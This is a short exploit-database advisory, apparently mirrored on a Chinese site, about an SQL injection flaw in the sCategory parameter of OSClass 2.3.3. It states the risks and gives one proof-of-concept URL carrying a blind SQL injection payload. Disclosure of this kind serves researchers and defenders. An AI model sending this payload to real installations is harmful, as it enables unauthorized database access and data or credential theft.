OSClass 2.3.3 – ‘index.php?sCategory’ SQL Injection

Exploit Database
18 阅读

作者： High-Tech Bridge SA

日期： 2012-01-25
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/36625/

source: https://www.securityfocus.com/bid/51662/info

OSClass is prone to SQL-injection and cross-site scripting vulnerabilities.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

OSClass 2.3.3 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?page=search&sCategory[]=0%27%20OR%20%28SELECT%20MID%28version%28%29,1,1% 29%29=5%29%20d%20--%202

last Exploits
OSClass 2.3.3 – ‘index.php?sCategory’ SQL Injection的更多信息

Advneced Management For Services Sites – File Disclosure：
Life Insurance Management System 1.0 – Multiple Stored XSS：
ManageEngine Applications Manager 13 – SQL Injection：
ColdBookmarks 1.22 – SQL Injection：
webERP 3.11.4 – Multiple Vulnerabilities：
Employee Management System 1.0 – `txtfullname` and `txtphone` SQL Injection：
thesystem App 1.0 – ‘username’ SQL Injection：
Daily Expense Manager 1.0 – Cross-Site Request Forgery (Delete Income)：